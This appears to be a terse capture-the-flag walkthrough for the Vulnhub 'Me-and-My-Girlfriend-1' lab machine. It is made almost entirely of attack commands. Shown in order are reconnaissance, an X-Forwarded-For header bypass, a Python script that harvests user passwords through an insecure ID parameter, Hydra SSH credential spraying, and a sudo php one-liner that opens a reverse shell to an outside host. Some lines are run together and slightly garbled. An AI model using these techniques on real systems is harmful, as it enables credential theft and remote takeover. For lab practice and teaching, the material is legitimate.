Vulnhub Me-and-My-Girlfriend-1

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

nmap -p- -sV -sC -A 192.168.0.109 -oA nmap_Me-and-My-Girlfriend-1

gobuster dir -u http://192.168.0.109 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

GET /index.php?page=profile&user_id=1 HTTP/1.1Host: 192.168.0.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=562182c40f4h6hedm2t05fui03Upgrade-Insecure-Requests: 1X-Forwarded-For: 127.0.0.1

#coding:utf-8 import requests import redef GetUserInfo(id):    headers = {'user-agent':'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0','X-Forwarded-For':'127.0.0.1'}    cookie = {'PHPSESSID':'562182c40f4h6hedm2t05fui03'}    response = requests.get(url="http://192.168.0.109/index.php?page=profile&user_id=%s"%id,headers=headers,cookies=cookie).text%    name=re.search('id="name"svalue="(.*?)">',response).group(1)    username=re.search('username"svalue="(.*?)"',response).group(1)    password=re.search('password"svalue="(.*?)"',response).group(1)    return name,username,passwordfor i in range(0,15):    name,username,password=(GetUserInfo(str(i)))    if name:        print (username+":"+password)

python3 get-user.py

hydra -C userinfo ssh://192.168.0.109

ssh alice@192.168.0.109ls -lacd .my_secretcat flag1.txt

sudo -l

nc -nvlp 6666

sudo php -r '$sock=fsockopen("192.168.0.106",6666);exec("/bin/bash -i <&3 >&3 2>&3");'

cat flag2.txt